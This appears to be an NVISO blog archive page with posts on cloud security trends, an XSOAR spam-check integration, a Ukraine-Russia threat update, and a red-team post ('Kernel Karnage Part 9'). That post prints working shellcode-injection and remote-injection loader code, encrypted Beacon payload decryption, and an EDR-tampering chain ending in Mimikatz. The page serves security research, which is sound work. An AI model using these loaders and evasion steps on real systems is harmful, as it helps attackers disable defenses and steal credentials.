I’m still busy investigating the exact workings of QueryCiEnabled() and QueryCiOptions() as I would like to remove dependencies on hardcoded offsets or external libraries/tools like Hacker Disassembler Engine 64. Once this process is complete, I can move on to optimizing code for OPSEC purposes, for example implementing direct syscalls as much as possible, and then convert the final result to a Beacon Object File for Cobalt Strike.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

4 Trends for Cloud Security in 2022

7 February 2022 at 13:25

The migration from an on-premises environment towards the public cloud started years ago and is still going on. Both governmental agencies and business organizations are in the journey of migrating and maturing their cloud environments[SW1] , pulled by the compelling need for streamlining, scaling, and improving their production.

It won’t potentially come as a surprise but moving to the cloud comes with new security challenges, and the more cloud environments grow, the more new concerns will rise. The main question that comes up is: are you properly protecting your cloud and its data against breaches due to an insecure state?

In this blogpost, we will try to provide answers to that question by formulating several key steps on how to ensure that a cloud environment is securely configured. From our experience as cloud security consultants, we notice that several organizations already started this road in one way or another but really encounter difficulties in reaching the maturity of having a structured approach combined with the required expertise.

Continuous Security Assessments

For those who started using and securing the cloud a while ago, misconfigurations are something of which today everyone is aware. However, these still happen very frequently even with companies that have had a Cloud-First strategy for years. The IBM Data Breach Report of 2021 even lists cloud misconfigurations as the third most common initial attack vector for data breaches, after compromised credentials and phishing. Thus, it is essential for an organization to spot existing flaws and new misconfigurations on a timely basis. An effective method to understand the state on a certain point in time is performing cloud security assessments or config reviews. If those are being executed periodically, it enables an organization to compare with previous reviews and confirm that the most critical findings are solved.

There are several sources of security best practices, benchmarks, and checklists against which public cloud customers can rate their cloud security posture. Widely used benchmarks are those of Center of Internet Security (CIS), which we extended with additional best practices and controls for our own cloud security assessments.

Some of the key topics we review during our Cloud Security Assessments.

Despite this, such assessments do not offer a real-time overview but are rather a snapshot of the configuration at a certain moment in time. Furthermore, these are often analysis made on sample checks, and not on the entire environment. The purpose is to make Operations and Security Operations teams aware of what is wrongly configured and what represents a threat to the company. What happens after the assessment? How do you ensure those flaws do not come back while creating new cloud environments? Will you learn the lesson and improve your security by design while engineering your environment? How?

Cloud Policies Deployment

Considering this, cloud security did a step forward. In few words, security experts started working on creating policies to monitor security and compliance across their cloud environments in an automated way. This is usually done via native tools like Azure Policies for Microsoft Azure, AWS Config for Amazon Web Services, and Google Security Command Center for Google Cloud Platform.

Native policy management solutions on major public cloud providers.

The benefit is huge: thanks to proper policies, one can manage compliance in the cloud by centralizing rules and adapting them to different purposes, for example, depending on production, corporate, sandbox environments, etc. Note that a basic set of policies from several of the largest frameworks and benchmarks (e.g., CIS Benchmark) can be configured out-of-the-box for the three largest cloud providers.

In this way, you will get more visibility and, in some cases, will allow you to automate remedies against violations or enforce security controls.

If your organization has today a fully implemented policy compliance monitoring setup, you can breathe a sigh of relief, but there is still work to do! Policies need to be reviewed, updated and extended when necessary. Most important, the tools offered by the major public providers are limited in their  multi-cloud environments applicability (for instance, Azure Policies can only onboard AWS Accounts, but no GCP or others).

How do you extend the same policies from a tenant to another? If you are using more than one provider, how difficult is it to re-adapt policies throughout your entire environment? Things might even get more complicated over the next years when policies need updates and continuous maintenance.

Replicability of your Secure Cloud Setup

As part of security improvements, leveraging Infrastructure as Code (IaC) can be a significant step towards deploying new cloud resources using Security and Compliance by design. IaC is not an only-security solution, but its usage in security is today highly recommended.

In the specific, it already becomes fundamental when an organization relies on multiple tenants across the globe, making it almost impossible to have a centralized visibility and ensuring cross-tenant compliancy.  

What exactly is IaC used for in cloud security? IaC allows you to codify your resources setup according to (also) security best standards. By replicating these codes, you can maintain your desired level of security and setup, keeping the coded configuration as minimum security requirements. This can streamline deployment of new environments and better control existing cloud workspaces.

Although public cloud providers offer their built-in solutions (see Azure Resource Manager, AWS CloudFormation and Google Cloud Deployment Manager), there are top-quality external IaC tools that perfectly work with all Azure, GCP and AWS. For instance, HashiCorp Terraform, VMware SaltStack or RedHat Ansible.

Some of the most common open-source solutions for Infrastructure as Code used to create cloud environments.

The challenge of multi-cloud protection

So, what is next? Did you really flag all the checkboxes? This is already incredibly good! But as the business needs and features evolve, so does the cloud and its security.

More and more organizations are working for a multi-cloud structure, meaning that rather than relying on only one public cloud provider, they are investing on – at least – a second solution. Reasons for this are multiple: for exit strategy, for third copy backup, for different knowledge of cloud providers in different geographical areas, and so on.

What really matters from a security perspective is that working with multiple cloud providers adds an extra level of challenges, as we need to ensure that similar security standards and compliance modules are respected across different platforms. This is something that few tools can ensure, due to the lack of interconnectivity across solutions and specific features necessary to such particular scenario.

Here Cloud Security Posture Management (CSPM) is called in.

All the security tools mentioned so far do not replace the previous one, rather they integrate each other and add a further layer of prevention, detection and response to security misconfigurations and breaches on the cloud.

The ultimate solution to manage security misconfigurations, secure policy setup and cross-cloud security management is CSPM.

What exactly is Cloud Security Posture Management?

According to Gartner’s definition, CSPM is a new category of security products that can help in improving visibility, centralizing security monitoring, improving automated responses and provide compliance assurance in the cloud.

Although Gartner’s article dates back to 2 years ago and CSPM is already on the market since a while, this is the right moment to start planning its deployment in a proactive way to avoid loss of control on multi-tenant, hybrid and multi-cloud environments.

2022 will be an important year for cybersecurity and for the cloud: working habits taken during the emergency of the pandemic are consolidating and are projecting the work environment towards an always more decentralized and remotely connected network, cross-country collaborations, shared working, and production environments that find fertile ground in the cloud and in its complex and articulated deployment.

In light of this, tools that can facilitate and streamline our work keeping and improving a high security posture are crucial for a seamless progression of the business world.

In conclusion

Depending on one’s security maturity, one of the steps here described can be the milestone you are currently checking. Nevertheless, it is important to plan what’s next and act proactively towards the deployment of the right solutions, pairing the production needs to their related security concerns and tackle them in advance.

We at NVISO observe different level of maturity over several customers and, in light of this, consider Policies, IaC templates and CSPM the goal on which we have to hardly work together in the next year.

About the author

Alfredo is a senior consultant part of the Cloud Security team and solution lead of Cloud Governance Services. He has an extended knowledge of Microsoft security solutions, applied on Azure and Microsoft 365 bundle. On top of that, Alfredo is keen on cloud solution innovations and thanks to this he developed an in-depth knowledge of several solutions on the market related to the most modern and secure ways to keep the cloud infrastructure safe from threats.

You can reach Alfredo via his LinkedIn page.

Automated spam detection in Palo Alto Cortex XSOAR

By: wstinkens
21 February 2022 at 13:05


With our Managed Detect and Respond (MDR) service at NVISO we provide a managed Security Operations Center (SOC) for a large variety of clients across different industries. In our SOC, we rely heavily on automations performed by our SOAR platform Palo Alto Cortex XSOAR to minimize the manual tasks that need to be done by our SOC analysts. With our “automation first” principle, we have mostly automated all tasks of L1 analysis allowing our analyst to focus on actionable security alerts to faster detect attackers in the environment of our customers.

User Reported Phishing

 A common problem for all our clients is phishing emails. This still is the most common initial attack vector for successful intrusions in a corporate environment.  Through awareness campaigns, users are educated about the risks of phishing email and how to spot them. In the awareness trainings, they are encouraged to report suspicious emails for analysis.

As a part of the NVISO MDR service, we offer a managed phishing option to review all user reported phishing emails. If automated analysis and manual review by a SOC analysts have determined that it is a true positive, these phishing mails are deleted from all user mailboxes across the entire organization.

What we have seen in our SOC is that even though users have been educated on how to spot phishing emails, it is still difficult for them to make the distinction between phishing mails and spam. We estimate that over 70% of user reported phishing mails are actually spam. As each mail is still manually verified by a SOC analyst after automated analysis,  this generates a high workload in our SOC.

Automated Spam Detection

To decrease the workload of our SOC analysts, we have implemented an automated spam check against a privately hosted email sandbox. This sandbox has a built-in SpamAssassin deployment which returns a spam score. SpamAssassin is the #1 Open Source anti-spam platform maintained by the Apache Software foundation and is widely used to filter emails and block spam.

If the spam score is above a certain threshold, we can confidently say that the mail is spam. We automatically inform the user about the difference between spam and phishing and close the incident without any manual actions required.

Postmark Spamcheck XSOAR Integration

To enable you to implement this workflow yourself without the complex task of setting up and operating a SpamAssassin infrastructure, NVISO has created a Postmark Spamcheck XSOAR integration which you can use to get the Spam score of emails.

In this integration, we make use of the free public SpamCheck API created by Postmark:

This API allows you to send EML files to the Postmark SpamAssassin infrastructure without any cost for you.

The integration is available on the Cortex XSOAR marketplace and on the Demisto Github repository:

The integration documentation can be found in the Cortex XSOAR documentation:

Integration Setup

Open the Cortex XSOAR Marketplace, search for Postmark Spamcheck and install the integration:

Once installed, open Settings in XSOAR, Open the integrations tab and search for Postmark Spamcheck:

Click Add instance and set the name: leave the other settings to their default values.

Click Test to verify connectivity and click Save & exit:

The integration is now setup and ready for use.

Integration Usage

To get the spam score of an email, you will first need to have it available as an EML file in Cortex XSOAR. To do this you can use an integration such as EWS O365 from the EWS content pack to pull emails from a mailbox in Exchange Online.

Execute the following command to list emails available in the configured mailbox:

!ews-search-mailbox query="*"  selected-fields="subject"
!ews-search-mailbox results

Because reported phishing emails are added to the mail as an attachment, we need to retrieve the attachment with the mail itemId:

!ews-get-attachment item-id="AAMkADcwYmI0ZjcwLTI2NzItNDNhYi05N2Y5LThlZDkxOWUyZWE0YwBGAAAAAADtD+ENzUZfQ7HIUnhsJ9tOBwCOoK5ZS6vGTLYi98YtY9nrAAAAAAEMAACOoK5ZS6vGTLYi98YtY9nrAAEYi07gAAA="
!ews-get-attachment result

The entryID of the retrieve attachment is available in the Context Data:

Context Data

To only get the spam score of the reported phishing mail, execute the following command:

!postmark-spamcheck [email protected] short=True
!postmark-spamcheck result

To get a full report with all the SpamAssassin rules that were hit, execute the following command:

!postmark-spamcheck [email protected]
!postmark-spamcheck result

The results of the postmark-spamcheck are also available in the Context Data which can be used in playbook:

Context Data

Based on the score returned by the postmark-spamcheck you can determine a threshold where you can confidently say that the reported phishing email is spam and take actions in your playbook accordingly.


In this blog post we introduced the free open-source Postmark Spamcheck integration for Palo Alto Cortex XSOAR created by the NVISO SOAR engineering team. This integration can be used in your playbooks for automated handling and analysis of reported phishing mails to determine the spam score and reducing the analyst workload in your SOC.

About the author

Wouter is an expert in the SOAR engineering team in the NVISO SOC. As the lead engineer and development process lead he is responsible for the design, development and deployment of automated analysis workflows created by the SOAR Engineering team to enable the NVISO SOC analyst to faster detect attackers in customers environments. With his experience in cloud and devops, he has enabled the SOAR engineering team to automate the development lifecycle and increase operational stability of the SOAR platform.

You can reach Wouter via his LinkedIn page.

Kernel Karnage – Part 9 (Finishing Touches)

22 February 2022 at 13:03

It’s time for the season finale. In this post we explore several bypasses but also look at some mistakes made along the way.

1. From zero to hero: a quick recap

As promised in part 8, I spent some time converting the application to disable Driver Signature Enforcement (DSE) into a Beacon Object File (BOF) and adding in some extras, such as string obfuscation to hide very common string patterns like registry keys and constants from network inspection. I also changed some of the parameters to work with user input via CobaltWhispers instead of hardcoded values and replaced some notorious WIN32 API functions with their Windows Native API counterparts.

Once this was done, I started debugging the BOF and testing the full attack chain:

  • starting with the EarlyBird injector being executed as Administrator
  • disabling DSE using the BOF
  • deploying the Interceptor driver to cripple EDR/AV
  • running Mimikatz via Beacon.

The full attack is demonstrated below:

2. A BOF a day, keeps the doctor away

With my internship coming to an end, I decided to focus on Quality of Life updates for the InterceptorCLI as well as convert it into a Beacon Object File (BOF) in addition to the DisableDSE BOF, so that all the components may be executed in memory via Beacon.

The first big improvement is to rework the commands to be more intuitive and convenient. It’s now possible to provide multiple values to a command, making it much easier to patch multiple callbacks. Even if that’s too much manual labour, the -patch module command will take care of all callbacks associated with the provided drivers.

Next, I added support for vendor recognition and vendor based actions. The vendors and their associated driver modules are taken from SadProcessor’s Invoke-EDRCheck.ps1 and expanded by myself with modules I’ve come across during the internship. It’s now possible to automatically detect different EDR modules present on a target system and take action by automatically patching them using the -patch vendor command. An overview of all supported vendors can be obtained using the -list vendors command.

Finally, I converted the InterceptCLI client into a Beacon Object File (BOF), enhanced with direct syscalls and integrated in my CobaltWhispers framework.

3. Bigger fish to fry

With $vendor2 defeated, it’s also time to move on to more advanced testing. Thus far, I’ve only tested against consumer-grade Anti-Virus products and not enterprise EDR/AV platforms. I spent some time setting up and playing with $EDR-vendor1 and $EDR-vendor2.

To my surprise, once I had loaded the Interceptor driver, $EDR-vendor2 would detect a new driver has been loaded, most likely using ImageLoad callbacks, and refresh its own modules to restore protection and undo any potential tampering. Subsequently, any I/O requests to Interceptor are blocked by $EDR-vendor2 resulting in a "Access denied" message. The current version of InterceptorCLI makes use of various WIN32 API calls, including DeviceIoControl() to contact Interceptor. I suspect $EDR-vendor2 uses a minifilter to inspect and block I/O requests rather than relying on user land hooks, but I’ve yet to confirm this.

Contrary to $EDR-vendor2, I ran into issues getting $EDR-vendor1 to work properly with the $EDR-vendor1 platform and generate alerts, so I moved on to testing against $vendor3 and $EDR-vendor3. My main testing goal is the Interceptor driver itself and its ability to hinder the EDR/AV. The method of delivering and installing the driver is less relevant.

Initially, after patching all the callbacks associated with $vendor3, my EarlyBird-injector-spawned process would crash, resulting in no Beacon callback. The cause of the crash is klflt.sys, which I assume is $vendor3’s filesystem minifilter or at least part of it. I haven’t pinpointed the exact reason of the crash, but I suspect it is related to handle access rights.

When restoring klflt.sys callbacks, EarlyBird is executed and Beacon calls back successfully. However, after a notable delay, Beacon is detected and removed. Apart from detection upon execution, my EarlyBird injector is also flagged when scanned. I’ve used the same compiled version of my injector for several weeks against several different vendors, combined with other monitoring software like ProcessHacker2, it’s possible samples have been submitted and analyzed by different sandboxes.

In an attempt to get around klflt.sys, I decided to try a different injection approach and stick to my own process.

void main()
    const unsigned char shellcode[] = "";
	PVOID shellcode_exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	RtlCopyMemory(shellcode_exec, shellcode, sizeof shellcode);
	DWORD threadID;
	HANDLE hThread = CreateThread(NULL, 0, (PTHREAD_START_ROUTINE)shellcode_exec, NULL, 0, &threadID);
	WaitForSingleObject(hThread, INFINITE);

These 6 lines of primitive shellcode injection were successful in bypassing klflt.sys and executing Beacon.

4. Rookie mistakes

When I started my tests against $EDR-vendor3, the first thing that happened wasn’t alarms and sirens going off, it was a good old bluescreen. During my kernel callbacks patching journey, I never considered the possibility of faulty offset calculations. The code responsible for calculating offsets just happily adds up the addresses with the located offset and returns the result without any verification. This had worked fine on my Windows 10 build 19042 test machine, but failed on the $EDR-vendor3 machine which is a Windows 10 build 18362.

for (ULONG64 instructionAddr = funcAddr; instructionAddr < funcAddr + 0xff; instructionAddr++) {
	if (*(PUCHAR)instructionAddr == OPCODE_LEA_R13_1[g_WindowsIndex] && 
		*(PUCHAR)(instructionAddr + 1) == OPCODE_LEA_R13_2[g_WindowsIndex] &&
		*(PUCHAR)(instructionAddr + 2) == OPCODE_LEA_R13_3[g_WindowsIndex]) {

		OffsetAddr = 0;
		memcpy(&OffsetAddr, (PUCHAR)(instructionAddr + 3), 4);
		return OffsetAddr + 7 + instructionAddr;

If we look at the kernel base address 0xfffff807'81400000, we can expect the address of the kernel callback arrays to be in the same range as the first 8 most significant bits (0xfffff807).

However, comparing the debug output to the expected address, we can note that the return address (callback array address) 0xfffff808'81903ba0 differs from the expected return address 0xfffff807'81903ba0 by a value of 0x100000000 or compared to the kernel base address 0x100503ba0. The 8 most significant bits don’t match up.

The calculated offset we’re working with in this case is 0xffdab4f7. Following the original code, we add 0xffdab4f7 + 0x7 + 0xfffff80781b586a2 which yields the callback array address. This is where the issue resides. OffsetAddr is a ULONG64, in other words "unsigned long long" which comes down to 0x00000000'00000000 when initialized to 0; When the memcpy() instruction copies over the offset address bytes, the result becomes 0x00000000'ffdab4f7. To quickly solve this problem, I changed OffsetAddr to a LONG and added a function to verify the address calculation against the kernel base address.

ULONG64 VerifyOffsets(LONG OffsetAddr, ULONG64 InstructionAddr) {
	ULONG64 ReturnAddr = OffsetAddr + 7 + InstructionAddr;
	ULONG64 KernelBaseAddr = GetKernelBaseAddress();
	if (KernelBaseAddr != 0) {
		if (ReturnAddr - KernelBaseAddr > 0x1000000) {
			KdPrint((DRIVER_PREFIX "Mismatch between kernel base address and expected return address: %llx\n", ReturnAddr - KernelBaseAddr));
			return 0;
		return ReturnAddr;
	else {
		KdPrint((DRIVER_PREFIX "Unable to get kernel base address\n"));
		return 0;

5. Final round

As expected, $EDR-vendor3 is a big step up from the regular consumer grade anti-virus products I’ve tested against thus far and the loader I’ve been using during this series doesn’t cut it anymore. Right around the time I started my tests I came across a tweet from @an0n_r0 discussing a semi-successful $EDR-vendor3 bypass, so I used this as base for my new stage 0 loader.

The loader is based on the simple remote code injection pattern using the VirtualAllocEx, WriteProcessMemory, VirtualProtectEx and CreateRemoteThread WIN32 APIs.

void* exec = fpVirtualAllocEx(hProcess, NULL, blenu, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

fpWriteProcessMemory(hProcess, exec, bufarr, blenu, NULL);

DWORD oldProtect;
fpVirtualProtectEx(hProcess, exec, blenu, PAGE_EXECUTE_READ, &oldProtect);

fpCreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)exec, exec, 0, NULL);

I also incorporated dynamic function imports using hashed function names and CIG to protect the spawned suspended process against injection of non-Microsoft-signed binaries.

HANDLE SpawnProc() {
    STARTUPINFOEXA si = { 0 };
    SIZE_T attributeSize;

    InitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize);
    si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize);
    InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attributeSize);

    UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &policy, sizeof(DWORD64), NULL, NULL);

    si.StartupInfo.cb = sizeof(si);
    si.StartupInfo.dwFlags = EXTENDED_STARTUPINFO_PRESENT;

    if (!CreateProcessA(NULL, (LPSTR)"C:\\Windows\\System32\\svchost.exe", NULL, NULL, TRUE, CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi)) {
        std::cout << "Could not spawn process" << std::endl;
        return INVALID_HANDLE_VALUE;

    return pi.hProcess;

The Beacon payload is stored as an AES256 encrypted PE resource and decrypted in memory before being injected into the remote process.

DWORD rcSize = fpSizeofResource(NULL, rc);
HGLOBAL rcData = fpLoadResource(NULL, rc);

char* key = (char*)"16-byte-key-here";
const uint8_t iv[] = { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f };

int blenu = rcSize;
int klen = strlen(key);

int klenu = klen;
if (klen % 16)
    klenu += 16 - (klen % 16);

uint8_t* keyarr = new uint8_t[klenu];
ZeroMemory(keyarr, klenu);
memcpy(keyarr, key, klen);

uint8_t* bufarr = new uint8_t[blenu];
ZeroMemory(bufarr, blenu);
memcpy(bufarr, rcData, blenu);

pkcs7_padding_pad_buffer(keyarr, klen, klenu, 16);

AES_ctx ctx;
AES_init_ctx_iv(&ctx, keyarr, iv);
AES_CBC_decrypt_buffer(&ctx, bufarr, blenu);

Last but not least, I incorporated the Sleep_Mask directive in my Cobalt Strike Malleable C2 profile. This tells Cobalt Strike to obfuscate Beacon in memory before it goes to sleep by means of an XOR encryption routine.

The loader was able to execute Beacon undetected and with the help of my kernel driver running Mimikatz was but a click of the button.

On that bombshell, it’s time to end this internship and I think I can conclude that while having a kernel driver to tamper with EDR/AV is certainly useful, a majority of the detection mechanisms are still present in user land or are driven by signatures and rules for static detection.

6. Conclusion

During this Kernel Karnage series, I developed a kernel driver from scratch, accompanied by several different loaders, with the goal to effectively tamper with EDR/AV solutions to allow execution of common known tools which would otherwise be detected immediately. While there certainly are several factors limiting the deployment and application of a kernel driver (such as DSE, HVCI, Secure Boot), it turns out to be quite powerful in combination with user land evasion techniques and manages to address the AI/ML component of EDR/AV which would otherwise require a great deal of obfuscation and anti-sandboxing.

About the author

Sander is a junior consultant and part of NVISO’s red team. He has a passion for malware development and enjoys any low-level programming or stumbling through a debugger. When Sander is not lost in 1s and 0s, you can find him traveling around Europe and Asia. You can reach Sander on LinkedIn or Twitter.

Threat Update – Ukraine & Russia war

24 February 2022 at 17:03

Last updated on 2022-03-17/ 8am CET

2022-02-25: added key historical operation: Cyclops Blink
2022-03-02: added note on spillover and recommendation
2022-03-03: added further information on attacks, updated recommendations
2022-03-07: added info on HermeticRansom decrypter and our mission statement
2022-03-15: added info on CaddyWiper and fake AV update phishing campaign used to drop Cobalt Strike
2022-03-17: added info on the removal of a deepfake video of Ukrainian President Zelenskyy

Introduction & background

In this report, NVISO CTI describes the cyber threat landscape of Ukraine and by extension the current situation. Understanding the threat landscape of a country, however, requires an understanding of its geography first and foremost.

Figure 1 – Map of Ukraine and bordering countries

Ukraine, bordered by Russia as well as Belarus has seen its share of hostile intelligence operations and near declarations of war. The annexation of Crimea, a peninsula that was officially recognized as part of Ukraine, was annexed by Russia early 2014: this was one of the first and larger “turning points” in modern history.

More recently, in 2018, Russia took it one step further after several years of absorbing Crimea as part of Russia, by installing a border fence to separate Crimea from Ukraine.[1]

In 2020, during several Belarusian protests targeted at Belarus’ current president Lukashenko, Ukraine recalled its ambassador to assess the prospects, or lack thereof, regarding their bilateral relationship.[2] Tensions increased further, and in 2021, Ukraine joined the European Union (EU) in imposing sanctions on Belarusian officials.[3]

In 2022, this tension materialized by Russia actively performing military operations on Ukraine’s border, and in February, the bombardment of several strategic sites in Ukraine.[4]

Historical Cyber Attacks

As mentioned, to understand a country, one needs to understand its geography and geopolitical strategy. A remarkable initiative from Ukraine is their intent on joining NATO as well as becoming an official member of the EU. These initiatives are likely the trigger for the recent turmoil, in December 2021, where Russia became openly bold, more aggressive and with ultimate goal as explained by Putin: to unify or absorb Ukraine back into Russia. In that same month, Putin presented to the United States and NATO a list of security demands, including Ukraine not ever joining NATO.[5] The intent of Putin is, as always, likely to have multiple dimensions.

This report will describe further history of cyber-attacks on Ukraine, a timeline of current relevant events in the cyberspace, and finally some recommendations to ensure protection in case of “cyberwar spillover” as was in the case of NotPetya in 2017.

As mentioned in the introduction, Ukraine has seen its fair share of targeted cyber-attacks. The table below captures significant Advanced Persistent Threat (APT) campaigns / attacks against Ukraine specifically.

Attack Group Attack Purpose Malware / Toolset Date
Black Energy (aka Sandworm) Disrupt / Destroy KillDisk / Black Energy 2015
Black Energy Disrupt / Destroy Industroyer 2016
Black Energy Disrupt / Destroy NotPetya 2017
Grey Energy (Black Energy successor) Espionage GreyEnergy 2018
Black Energy Espionage VPNFilter 2018
Unknown, likely DEV-0586 (aka GhostWriter) Disrupt / Destroy WhisperGate 2022
Unknown, likely DEV-0586 Disrupt / Destroy HermeticWiper 2022
Black Energy Disrupt / Destroy Cyclops Blink 2022*
Table 1 – Key historic attacks

Other attacks have taken place, both cyber-espionage and cyber-criminal, but the threat group “Black Energy” is by far the most prolific in targeting Ukrainian businesses and governmental institutions.

Black Energy and its successors and sub-units are attributed to Russia’s Intelligence Directorate or GRU (now known as the “Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation”). The GRU is Russia’s largest foreign intelligence agency and has therefore access to a vast number of resources, capabilities, and certain freedom to execute more risky intelligence operations. Note that APT28, also known as Sofacy and “Fancy Bear” is also part of the GRU but resides in a different unit.[6]

Specifically looking at the attacks targeting Ukraine in 2022, a timeline can be observed below:

Figure 2 – Ukraine 2022 timeline

Highlighted in blue on the timeline, are suspected attack campaigns by nation states, likely either Russia or Belarus. Highlighted in green are suspected attack campaigns by cybercriminal actors in favor of Russia.

Highlighted in red on the timeline, is an intelligence counteraction by Ukraine’s Security Service, known as the SSU or SBU. The SSU can be seen as Ukraine’s main government agency protecting national interests, but also has a focus on counterintelligence operations. On February 8th 2022, the SSU shut down a Russian “trolling farm” that had as sole intent to distributed “fake news” to spread panic. The bots also published false information about bomb threats at various facilities.[7]

NVISO CTI assesses with moderate confidence Russia and Belarus will continue destructive or espionage operations on Ukraine’s infrastructure and those who support Ukraine whether it be logistically, operationally, or otherwise publicly.

As of yet, spillover of these operations has not been observed in Belgium by organizations such as the Centre for Cyber security Belgium (CCB).[8] The UK’s National Cyber Security Centre (NCSC) in turn advices “organizations to act following Russia’s attack on Ukraine” and provides further guidance.[9]

Key historical operations

In a quick overview of the aforementioned pre-2022 attacks, the following are some of the key elements that contributed to their success, and which are important to take into account when building a detection strategy:

  • The attack on the Ukrainian power grid was prefaced with a phishing attack against a number of energy distribution companies. The phishing email contained a Word document that, when Macros were enabled, dropped the Black Energy malware to disk. Using this malware the adversaries obtained credentials to access VPN and remote support systems that allowed them to open circuit breakers remotely. In order to prevent the operators from closing the circuit breakers remotely again, a wiper was deployed on the operator machines.
  • NotPetya was initially deployed via a supply chain attack on Linkos Group. The NotPetya ransomware caused worldwide damages due to its highly effective spreading mechanism combining the EternalBlue (MS17-010) vulnerability, credential dumping from infected systems and PsExec for lateral movement.
  • GreyEnergy and its accompanying toolset was typically prefaced with a phishing attack, containing malicious documents that would deploy “GreyEnergy mini”, a first-stage backdoor. A second point of entry was via vulnerable public-facing web services that are connected to the organization’s internal network. The attacker’s toolset also contained Nmap and Mimikatz for discovery and lateral movement.
  • VPNFilter is a multi-stage, modular platform with versatile capabilities to perform a wide range of operations, primarily espionage but also destructive attacks. The malware installs itself on network devices such as routers and NAS, and can only be completely removed with a full reinstallation. Its current preface or infection vector is unknown, but it is assumed they target vulnerabilities in these network devices as an initial entrypoint. VPNFilter was a broad-targeting malware and campaign, but was responsible for multiple large-scale attacks that targeted devices in Ukraine.
  • Cyclops Blink is the “replacement framework” of VPNFilter and has been active since at least June 2019, fourteen months after VPNFilter was disrupted. Just like VPNFilter, Cyclops Blink is broad-targeting, but might be targeting devices in Ukraine specifically. As opposed to VPNFilter, Cyclops Blink is only known to target WatchGuard network devices at this point in time. Its preface is WatchGuard devices that expose the remote management interface to the internet / external access.

Current Cyber Attacks (2022)


Starting on January 13th, 2022, several Ukrainian organizations were hit with a destructive malware now known as WhisperGate. The malware was designed to wipe the Master Boot Record, MBR, and proceed to corrupt the files on disk, destroying all traces of the data.

Initial execution of the first stage was completed using the Python tool Impacket, this being widely used for lateral movement and execution. Initial access to run Impacket is believed to have occurred via insecure remote access channels and using stolen/harvested credentials.

Once the MBR is wiped, a fake ransom screen is displayed. This is just to distract while the third stage is downloaded from a Discord link. Then all data is overwritten on disk.

Massive web defacements

Between the 13th and 14th of January, a coordinated web defacement on several governmental institutions of Ukraine took place – all websites and their content were wiped and replaced with a statement[10]:

Ukrainian! All your personal data has been sent to a public network. All data on your computer is destroyed and cannot be recovered. All information about you stab (public, fairy tale and wait for the worst. It is for you for your past, the future and the future. For Volhynia, OUN UPA, Galicia, Poland and historical areas.[10]

The SSU assesses the attack happened via a vulnerable Content Management System (CMS), and that “in total more than 70 state websites were attacked, 10 of which were subjected to unauthorized interference”.[11]

DDOS attacks on organizations

On February 15th, Ukraine’s Ministry of Defence (MoD) tweeted[11] that “The MOU website probably suffered a DDoS attack: an excessive number of requests per second was recorded.

Technical works on restoration of regular functioning are carried out.”

The attack was carried out on the MoD itself and the Armed Forces of Ukraine, but also on two national banks, which had as result that internet banking was not available for several hours.

DDoS attacks & the “HermeticBunch”

On February 23rd, there were two newly reported cyber events: DDoS attacks and an attack campaign we could name “HermeticBunch”.

NetBlock, an internet observatory, noted the DDoS attacks on February 23rd around 4pm CET. The attacks were impacting the websites of Ukraine’s MoD, Ministry of Foreign Affairs (MoFA) and other governmental institutions.[12]

ESET initially reported[13] detecting a new wiper malware used in Ukraine. Their telemetry indicated the malware was installed on several hundreds of machines with first instances discovered around 4pm CET. Symantec posted an analysis[14] the next day corroborating ESET’s findings, and providing more insight into the attack: ransomware was initially deployed, as a smokescreen, to hide the data-wiping malware that was effectively used to launch attacks against Ukrainian organizations.

ESET reported on March 1st [15] that multiple Ukrainian organizations were targeted by an attack campaign comprising:

  • HermeticWiper, a data-wiping malware;
  • HermeticWizard, spreads HermeticWiper over the network (using WMI & SMB);
  • HermeticRansom: likely a ransomware smokescreen for HermeticWiper.

These components indicate an organized attack campaign with as main purpose destruction of data. While the spreader malware, HermeticWizard, is worrisome, it can be blocked by implementing the advice from the Recommendations section below.

Note that AVAST Threat Labs has created a decrypter for files encrypted with HermeticRansom. [17]


IsaacWiper was first detected by ESET on February 24th [18], and was leveraged again for destructive attacks against the Ukrainian government. The wiper is less sophisticated than HermeticWiper, but not less effective.


DanaBot is a Malware-as-a-Service (MaaS) platform where threat actors (“affiliates”) can purchase access to the underlying DanaBot platform. Zscaler reported on March 2nd [19] to have identified a threat actor targeting Ukraine’s Ministry of Defense (MoD) using DanaBot’s download and execute module.

Fake AV Update leading to Cobalt Strike

Phishing emails impersonating the Ukrainian government were seen during a campaign to deliver Cobalt Strike beacons and Go backdoors on the 12th of March. Reported by the Ukraine CERT (CERT-UA) [20], the emails were themed as “critical security updates” and contained links to download a fake AV update package. The 60 MB file was actually a downloader which then connected to a Discord CDN to download a file called one.exe. This being a Cobalt Strike beacon. It also downloads a Go dropper that executes and pulls down two more Go payloads, GraphSteel and GrimPlant. Both of these being backdoors.


CaddyWiper was discovered by ESET on March 14th [21] and it is the 4th data wiping malware to be used against Ukraine. It was deployed in the attacks via GPO, this showing that the threat actor already had a major foothold in the environment. It also has functions to cause it to not wipe Domain Controllers, this being the foothold the attackers would lose if destroyed.

Deepfake video

On 16 Mar 2022, Facebook removed a deepfake video of Ukrainian President Zelenskyy asking Ukrainian troops to surrender. The video initially appeared on the compromised website of news channel, Ukraine 24, before it was spread to other compromised websites, such as Segodnya. In response, Zelenskyy published a video of his own, asking Russian troops to surrender instead. [22]


Based on the collective knowledge on adversary groups acting in the interests of the Russian state and the current ongoing events, it is important for organizations to use this momentum to implement a number of critical defenses and harden their overall environment.

